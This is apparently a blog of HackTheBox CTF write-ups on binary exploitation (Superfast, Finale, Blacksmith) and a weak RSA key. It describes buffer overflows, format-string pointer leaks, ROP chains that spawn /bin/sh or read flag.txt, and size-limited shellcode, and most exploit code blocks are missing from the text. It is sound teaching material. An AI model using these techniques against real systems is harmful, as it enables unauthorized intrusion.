Hey folks. In this write-up, we're going to discuss the Superfast challenge in HackTheBox which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and perform a Return Oriented Programming (ROP) chain. The description of the challenge is:
We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we acquired from a temporarily exposed Git repository several months ago. Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners – can you find a way in?
I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.
Index
First looks
Finding primitives
Developing the ROP chain
Retrieving the flag
First looks
We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.
In /challenge/start.sh we can see that the challenge code gets bootstrapped using:
We can see that PHP loads php_logger.so as a binary extension for the webserver.
Finding primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.
Analysing index.php
The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.
One of the most important stages of exploit development is building an environment in which the bug can be reproduced. Since I want to run GDB on php_logger.so, I will run the challenge without Docker. I can serve index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/ and send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123'. We can see it succeeds because it returns a 200 status code.
Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.
Analyzing php_logger.so
We can find the source code of php_logger.so in /src/php_logger.c, which also contains the source code of log_cmd(). We can see that log_cmd() retrieves its function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and, if the return value is valid, appends to the /tmp/log file.
This function itself looks safe, so the vulnerability must be in decrypt(input, size, key). This function is meant to check that the size of the command is smaller than the size of the stack buffer. If it is larger, the function should return; otherwise it will memcpy() the input into the buffer and XOR the buffer with the key.
We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit. Since we are essentially doing ulong - int > int, we are using an unsigned value as a base value which means the value will wrap around. For example, in this case (uint)0 - (int)1 would become 2**32-1, instead of -1. A practical example would be the one below. The output of the program is 4294967295 1.
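The same wrap-around can be emulated in Python by masking the result to a fixed width. This is only a sketch of the arithmetic, not the challenge code: BUF_SIZE is a hypothetical buffer size and both helper names are made up for illustration.

```python
# Emulate C's unsigned arithmetic by masking results to a fixed bit width.
BUF_SIZE = 64  # hypothetical buffer size, for illustration only


def unsigned_sub(a, b, bits=32):
    """Return a - b the way a `bits`-wide unsigned C integer would."""
    return (a - b) & ((1 << bits) - 1)


def size_check_passes(size, bits=64):
    """Model of `sizeof(buffer) - size > 0` with an unsigned left-hand side."""
    return unsigned_sub(BUF_SIZE, size, bits) > 0


print(unsigned_sub(0, 1))                 # 4294967295
print(size_check_passes(BUF_SIZE))        # False: the only rejected size
print(size_check_passes(BUF_SIZE + 100))  # True: oversized input is accepted
```

Because the subtraction can never go negative, every size other than the exact buffer size passes the check.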
That means that sizeof(buffer) - size > 0 is always true, unless sizeof(buffer) == size. The result of that is a buffer overflow on the stack which we can leverage for a control flow hijacking primitive. Using Ghidra, the reverse engineering suite developed by the NSA, we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.
However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the lowest 12 bits of an address are not randomized, so a partial overwrite that stays within those bits is reliable. Say our normal return address would be 0x555555559a1e; in the next run it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because it's the lowest 12 bits.
The reason the lowest 12 bits of the address don't change is that they are the offset within a 4096-byte (2 ** 12) page. The kernel, which manages ASLR, maps memory in whole pages, so it can only randomize which page an address lives in, not the offset inside that page.
Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char data type. This means we could only overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.
In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is equal to 0x1014129. This means our scope of possible return addresses ranges from 0x1014100 to 0x10141ff.
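As a rough sketch, the reachable range and the overflow payload for a single-byte overwrite could be computed like this. The helper names are hypothetical, and the sketch assumes that decrypt() XORs every copied byte with the key, so the payload is pre-XORed to make the intended bytes land on the stack.

```python
RET_OFFSET = 0x98         # buffer-to-return-address offset from Ghidra
ORIGINAL_RET = 0x1014129  # return address into log_cmd() without ASLR


def reachable_range(ret_addr):
    """Addresses reachable by overwriting only the lowest byte."""
    low = ret_addr & ~0xFF
    return low, low | 0xFF


def build_payload(target_low_byte, key):
    """Padding up to the return address plus one overwritten byte.

    Assumption: the target XORs each copied byte with `key`, so we
    XOR in advance to end up with the raw bytes we actually want.
    """
    if not 0 < key < 256:
        raise ValueError("key must satisfy 0 < key < 256")
    raw = b"A" * RET_OFFSET + bytes([target_low_byte])
    return bytes(b ^ key for b in raw)


low, high = reachable_range(ORIGINAL_RET)
print(hex(low), hex(high))             # 0x1014100 0x10141ff
print(len(build_payload(0x55, 0x7B)))  # 153
```

The low byte 0x55 and the key 0x7B in the usage lines are arbitrary values chosen only to exercise the helper.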
The code in our return scope is the following. We can see that decrypt() is called, print_message() is called and a bunch of file IO functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.
However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.
When I try to fuzz using a script, I receive the following output:
However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041 and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this isn't executable it's irrelevant for the ROP chain.
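The decoding step can be reproduced with the standard library alone. The sketch below re-implements a u64-style helper with struct and assumes that the trailing 0x41 in the leaked value is the last padding byte ('A') rather than part of the pointer, which is why it is shifted off before checking the mapping.

```python
import struct


def u64(data):
    """Unpack up to 8 bytes as a little-endian unsigned 64-bit integer."""
    return struct.unpack("<Q", data[:8].ljust(8, b"\x00"))[0]


def in_mapping(addr, start, end):
    """True if addr lies inside the [start, end) mapping."""
    return start <= addr < end


tail = b"A\x80\xd4\x85T\x81\x7f"  # end of the response quoted above
leak = u64(tail)
print(hex(leak))       # 0x7f815485d48041
print(hex(leak >> 8))  # 0x7f815485d480, assuming the low byte is padding

# Second leak from the GDB session, checked against the vmmap line.
print(in_mapping(0x7F651305F54041 >> 8, 0x7F6513000000, 0x7F6513200000))  # True
```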
Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:
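A minimal sketch of how such a response could be split back into integers is shown here. The sample body is made up purely for illustration, so the real values (and which position holds which pointer) will differ, and parse_leak is a hypothetical helper name.

```python
# Nine "%llx_" fields, matching the format string used above.
FORMAT = b"%llx_" * 9


def parse_leak(body):
    """Split an underscore-separated hex dump into a list of integers."""
    return [int(field, 16) for field in body.split(b"_") if field]


# Made-up response body, NOT real challenge output.
sample = b"7ffd1c2b3a40_0_7f815485d480_55d0c0a1e000_1_"
for index, value in enumerate(parse_leak(sample)):
    print(index, hex(value))
```

Once the position of each pointer is known, subtracting its fixed offset gives the base address of the corresponding mapping.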
We have the needed primitives, so we can develop the ROP chain.
Developing the ROP chain
Now we can use pwntools' ELF classes to build ROP chains automatically. Using pwntools' ELF class we can see that the execl function is in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:
Leaking the address of the PHP binary and the php_logger.so in memory.
dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable
We can generate a ROP chain automatically with pwntools:
Which gives the following ROP chain:
As we can see, it does the following:
Retrieving the flag
I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.
Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.
Hey all. Today we're going to discuss the retired Finale challenge on HackTheBox. The description on HackTheBox is as follows:
It's the end of the season and we all know that the Spooktober Spirit will grant a souvenir to everyone and make their wish come true! Wish you the best for the upcoming year!
In this write-up, we will learn about the stack, ROP chains, and prioritizing attack vectors.
Spoiler alert: if you can't find the libc version, it's not a bug.
Summary
First looks
Finding vulnerability primitives
Developing the ROP chain
Retrieving the flag
Failed attempt
First looks
We are given an executable binary called finale. Upon performing a dynamic analysis, we are prompted for a password which means that we'll need to do a static analysis in order to proceed.
Running pwntools' checksec on finale gives us:
The fields mean:
Arch: the CPU architecture and instruction set (x86, ARM, MIPS, …)
Stack Canaries: protects against stack buffer overflow attacks
NX: No eXecute – write-able memory cannot be executed
PIE: Position Independent Executable – address randomization
For a more in-depth explanation of checksec, please visit our previous blogpost about the Blacksmith challenge on Hack The Box. The logical conclusion is that we need to perform a stack-based buffer overflow (since stack canaries are disabled) leading to a Return-Oriented Programming chain (since NX is enabled).
Finding vulnerability primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact.
Main() analysis
In order to analyze the binary, I opened it up in Ghidra, made by the NSA. The main() function prints 8 random bytes, asks us for a secret and calls finale().
As we can see, the secret for the binary is s34s0nf1n4l3b00 and finale() gets called after the correct secret has been entered.
Finale() analysis
As said, main() calls finale() after the secret has been entered. This function asks us for a wish for the next year.
We are given a stack leak in the form of char* buf. Furthermore, there is a stack buffer overflow: the buffer length is 64 and we are writing 0x1000 (4096) bytes. In Ghidra we can see that the offset to the return address from the base of buf is 0x48 bytes.
GOT
Considering checksec said No PIE (0x400000), the binary is always loaded at the same address, so we can use the Procedure Linkage Table (PLT) section of the binary. This means we could open a potential flag.txt using open(), read() and write().
Developing the ROP chain
Considering the protections in the binary listed by checksec state that No eXecute is enabled, we need to use Return Oriented Programming (ROP) chains. We want to do the following in the payload:
fd = open("flag.txt", 0);
n_read = read(3, buf, size); // 3 since fd == 3 can be expected
write(1, buf, n_read);
We have access to:
Binary/ELF
GOT and PLT (linked functions)
Functions (built-in functions)
Stack
Using print(*ELF('challenge/finale').plt.keys()), we can see that the following functions are available in the PLT sections:
Now that we have the right functions and have access to the stack (for "flag.txt"), we need a way to pass function arguments. The System V AMD64 calling convention (used on x64 Linux) states that function arguments should be passed (in order) via RDI, RSI, RDX, RCX, R8, R9. This means that we need to control the RDI, RSI, and RDX registers via pop instructions (called gadgets) in the ROP chain in order to pass 3 arguments to open(), read(), and write(). We can search for such gadgets using ropr: a blazing fast multithreaded ROP Gadget finder. Below is my search regex filter for ropr:
$ ropr -R '^pop (rdi|rsi|rdx); ret;' challenge/finale
0x004012d6: pop rdi; ret;
0x004012d8: pop rsi; ret;
Sadly, ropr can't find any gadgets for the RDX register. Even after trying many more search queries (like EDX and DX), I couldn't find any results. This means that we need to find a workaround for a high-enough RDX value for read(..., ..., size=RDX).
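With the two gadgets that were found, a call that takes two arguments can be laid out on the stack as in the sketch below. The gadget addresses and the 0x48 offset come from the text; OPEN_PLT and PATH_ADDR are hypothetical placeholders (the real values come from the binary's PLT and the leaked buf address), and the helper names are made up.

```python
import struct

POP_RDI = 0x004012D6  # pop rdi; ret;  (from the ropr output)
POP_RSI = 0x004012D8  # pop rsi; ret;  (from the ropr output)
RET_OFFSET = 0x48     # distance from buf to the return address

OPEN_PLT = 0x401170         # hypothetical placeholder for open@plt
PATH_ADDR = 0x7FFFDEADB000  # hypothetical placeholder for the leaked buf


def p64(value):
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack("<Q", value)


def call_two_args(func, arg1, arg2):
    """ROP fragment: load RDI and RSI, then return into func."""
    return p64(POP_RDI) + p64(arg1) + p64(POP_RSI) + p64(arg2) + p64(func)


# The path string sits at the start of buf, padded up to the return address.
payload = b"flag.txt\x00".ljust(RET_OFFSET, b"A")
payload += call_two_args(OPEN_PLT, PATH_ADDR, 0)
print(len(payload))  # 112
```

Storing the path at the start of buf is one possible design choice: since the address of buf is leaked, the same write that overflows the stack also places the string at a known location.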
GNU Debugger (GDB)
In order to find out a way to get a high RDX value, I used GDB with the Pwndbg plug-in (please say /pwn-dbg/ and not /poʊndbæg/ as the repo proposes). To see the RDX value during runtime, we can use the GDB functions in pwntools:
As we can see, RDX is equal to 8 which means only 8 bytes of the flag get read and written to stdout. Since we need to read at least 32 bytes, we need to find a way of manipulating the RDX register. We could do this by:
Calling open("flag.txt", 0) using the PLT section in the ELF (which only executes the function and immediately returns after)
Manipulating RDX
Calling 0x4014e0 so we read() with the manipulated RDX and write() to stdout all at once.
As said, I tried finding gadgets which sadly did not work. After manually analyzing the binary I happened to see the following gadget:
As we can see, the EDX register is set to 0x54. This means we will read and write 84 bytes of the flag, which means it's more than enough and that we have completed the final part of the ROP chain:
In my failed attempt I tried to get remote code execution using leaked libc offsets, but it turned out that the libc version on the server was custom and it was intended to prevent this solution. I had to find out by asking the creator of the challenge.
The way we leak libc addresses is by calling puts() in the PLT section with the argument being a libc function linked in the GOT section. So, we need to call puts(const char *string); with argument string via the RDI register in AMD64. To control the RDI register, we use a ROP chain that pops RDI:
$ ropr -R 'pop rdi; ret;' challenge/finale
0x004012d6: pop rdi; ret;
==> Found 1 gadgets in 0.004 seconds
Now we can pop a GOT function address into RDI and call puts() to leak the function offset. Let's run the following script with the server as target to get their libc version:
When I enter those symbols and addresses into a libc-leak website like libc.rip, I cannot find a single libc version. That means that there's a custom libc version, which means we can't call system() since we don't have the address.
G'day everyone! In this write-up we are going to solve the retired WeakRSA challenge on Hack The Box. In order to do so, however, it is important that you understand some of the basics. You will learn:
Basic RSA
Decoding pem formats
How does RSA work?
RSA is an encryption algorithm which has been around since 1977. To use it, you need to choose two different large prime numbers, which we will name p and q.
By multiplying p and q together you get your modulus, named N. Then you choose your public exponent, which we will name e. Now you are ready to encrypt your secret message. Using RSA, our encrypted message is calculated like this : (message^e) mod N
In python3 it can be computed like this :
pow(message,e,N)
Decrypting RSA
Decrypting will be a little bit harder. To do so we first must find φ(N) (phi). We can do so like this : φ(N) = (p-1) * (q-1).
Remember that we need to know p and q to decrypt; this is important. We are finally ready to calculate d, the modular inverse of e modulo φ(N). This can be done by using the extended Euclidean algorithm. You don't have to understand how (or why) it works but saying it will make you look smart. In python I use xgcd from the libnum library. d will be the first value the algorithm outputs.
d = xgcd(e, φN)[0]
The plaintext can then be calculated :
plaintext = pow(encrypted, d, N)
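To make the formulas concrete, here is a toy round trip with deliberately tiny textbook primes. The xgcd below is a hand-written stand-in that returns its values in the same order as described above (it is not the libnum implementation), and the result is reduced modulo φ(N) because the first coefficient can come out negative.

```python
def xgcd(a, b):
    """Extended Euclid: return (x, y, g) with a*x + b*y == g == gcd(a, b)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return x0, y0, a


p, q = 61, 53            # toy primes, far too small for real use
N = p * q                # 3233
phi = (p - 1) * (q - 1)  # 3120
e = 17

d = xgcd(e, phi)[0] % phi  # reduce, since the raw coefficient may be negative
message = 65
encrypted = pow(message, e, N)
plaintext = pow(encrypted, d, N)

print(d, encrypted, plaintext)  # 2753 2790 65
```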
Solving the challenge
After downloading and extracting the zip we get a public key stored in a .pub file. We can decode it using python or just by using an online tool, which gives us the following data :
The modulus is the public key's N and the public exponent is our e.
We know that the modulus is just p * q but it will take forever to factor such a large number. If only there was a quicker method. Wait a minute, what if there are databases containing the factors of large numbers… That would be really helpful. After some searching I encountered this site. Let's try to input our N :
Looks like we found p and q. From here we can get the flag using python :
The lesson this challenge is trying to teach us is that p and q should be large, randomly chosen primes (current guidance is a modulus N of at least 2048 bits, so p and q of roughly 1024 bits each). This way the public key is far less likely to be factorized, so p and q can't be found and your secret messages can't be decrypted.
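Once the factors are known, the whole attack is a few lines of arithmetic plus a conversion from integer back to bytes. The sketch below uses two small Mersenne primes and a made-up message as stand-ins, since the challenge's real N, e and ciphertext are not reproduced here; pow(e, -1, phi) needs Python 3.8 or newer.

```python
# Stand-in values: NOT the challenge's key material.
p = 2**31 - 1  # plays the role of the first recovered factor
q = 2**61 - 1  # plays the role of the second recovered factor
e = 65537

n = p * q
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)  # modular inverse of e modulo phi (Python 3.8+)


def int_to_bytes(value):
    """Convert a non-negative integer to big-endian bytes."""
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


secret = b"toy flag"  # made-up message, must be smaller than n
ciphertext = pow(int.from_bytes(secret, "big"), e, n)

recovered = int_to_bytes(pow(ciphertext, d, n))
print(recovered)  # b'toy flag'
```

Anyone who can factor n can repeat these steps, which is why a modulus whose factors are already listed in a public database offers no protection.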
Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:
You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".
In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.
Summary
First looks
Finding vulnerability primitives
Developing AMD64 (x86_64) assembly
Retrieving the flag
First looks
We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to trade items:
Usually, I start by checking the binary's security using pwntools' checksec. In this case, the security of blacksmith binary is:
The fields in checksec mean the following:
Arch: the CPU architecture and instruction set (x86, ARM, MIPS, …)
The logical conclusion is that we need to write a shellcode to the RWX memory to read out flag.txt (based on the challenge description).
Finding vulnerability primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:
an information leak primitive to leak an address
an arbitrary write primitive to control the execution flow
… which can work together by controlling the execution flow by writing a leaked address.
Main analysis
When I want to find vulnerability primitives, I open the binary in Ghidra, a reverse engineering tool developed by the NSA (yes, that NSA). I start off analyzing a binary at the main function. In this case, it looked like the following:
So, the main function does the following:
setup()
sec()
shield(), bow() or sword()
In addition to that, the main function uses a stack canary stored in the variable __can_token. As you can see, if __can_token is not equal to its original value, stack corruption has been detected and hence __stack_chk_fail is called, which exits the program.
The function setup disables buffering for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.
Sec function
We can see that the sec function primarily creates an allow list using seccomp of the syscalls sys_read, sys_write, sys_open, and sys_exit. (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) By doing this, the developer of the program prevents us from executing our shell on the server since we would need to sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.
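The effect of the filter can be pictured with a small model. This is only an illustration of the allow-list idea, not how seccomp is implemented; the numbers are the x86_64 Linux syscall numbers and is_allowed is a hypothetical helper.

```python
# x86_64 Linux syscall numbers for the calls discussed above.
SYSCALLS = {"read": 0, "write": 1, "open": 2, "execve": 59, "exit": 60}

# The allow list that sec() installs, expressed as syscall numbers.
ALLOWED = {SYSCALLS[name] for name in ("read", "write", "open", "exit")}


def is_allowed(name):
    """True if the named syscall is on the allow list."""
    return SYSCALLS[name] in ALLOWED


for name in ("open", "read", "write", "execve"):
    print(name, is_allowed(name))
```

Anything we want the payload to do therefore has to be expressed with open, read, write and exit only.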
Shield analysis
Furthermore, we have the shield(), bow() or sword() calls in main(). The bow() and sword() functions crash the program before a user can give input, which means they are irrelevant. So the vulnerability must be in shield().
What sticks out to me in this function is that we have user input and are calling a variable like a function using (*(code *)buf)();. The code (*(code *)buf)(); is equivalent to the ASM below:
The (*(code *)buf)(); function call executes the contents of the buf variable on the stack as machine code. This means we can inject our own assembled code (shellcode) into the program.
Developing AMD64 (x86_64) assembly
We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:
We have 63 bytes to work with:
We can only use sys_read, sys_write, sys_open and sys_exit:
We do not have a stack address (ASLR)
However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading flag.txt into a buffer, and writing the buffer to stdout.
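Before writing any assembly, the open/read/write strategy can be tried out at a higher level. The sketch below uses Python's os module as a stand-in and a temporary file instead of the real flag.txt; dump_file is a hypothetical helper, and the exact syscalls Python issues under the hood may differ from the ones the shellcode will use.

```python
import os
import tempfile


def dump_file(path, size=64, out_fd=1):
    """Open a file, read up to `size` bytes, and write them to out_fd."""
    fd = os.open(path, os.O_RDONLY)  # counterpart of sys_open
    try:
        data = os.read(fd, size)     # counterpart of sys_read
    finally:
        os.close(fd)                 # tidy-up only; the shellcode skips this
    os.write(out_fd, data)           # counterpart of sys_write (1 is stdout)
    return data


# Demo on a temporary stand-in file rather than the real flag.txt.
with tempfile.NamedTemporaryFile(delete=False) as handle:
    handle.write(b"stand-in flag\n")
demo_path = handle.name
result = dump_file(demo_path)
os.unlink(demo_path)
```

The assembly payload has to perform the same three steps, with the arguments placed in registers instead of being passed to a function.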
To interact with those files, we need to utilize system calls ("syscalls"). Syscalls are essentially an ABI (binary API) to the Linux kernel, which is like the god of the operating system. The kernel provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent resource (I've read it).
I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:
I came up with the following ASM:
Since we have only 63 bytes to work with, I had to be creative. In assembly, many bytes are spent on constant values: an instruction like mov rax, 2 is typically encoded in 7 bytes, because the small constant is stored as a zero-padded 4-byte immediate. That means we can save a lot of bytes by reusing register values.
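The size difference is easy to see by comparing the raw encodings of a few ways to get the value 2 into RAX. The byte strings below are the standard x86_64 encodings written out by hand; which form an assembler actually emits for mov rax, 2 depends on the assembler, so treat the table as a sketch rather than as the output of a specific tool.

```python
# Hand-written x86_64 encodings of instructions that put 2 into RAX.
ENCODINGS = {
    "mov rax, 2": bytes.fromhex("48c7c002000000"),  # REX.W + 4-byte immediate
    "mov eax, 2": bytes.fromhex("b802000000"),      # zero-extends into RAX
    "push 2; pop rax": bytes.fromhex("6a0258"),     # 1-byte immediate via stack
    "mov al, 2": bytes.fromhex("b002"),             # only valid if RAX is 0
}

for text, code in ENCODINGS.items():
    print(f"{text:<16} {len(code)} bytes  {code.hex()}")
```

The shorter forms come with conditions (for example, mov al, 2 only works when the upper bits of RAX are already zero), which is why reusing known register values matters so much in a small payload.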
I eventually refactored the payload into 46 bytes:
Retrieving the flag
Now that we have a working payload, we need to send it to the application. I made the following script using pwntools: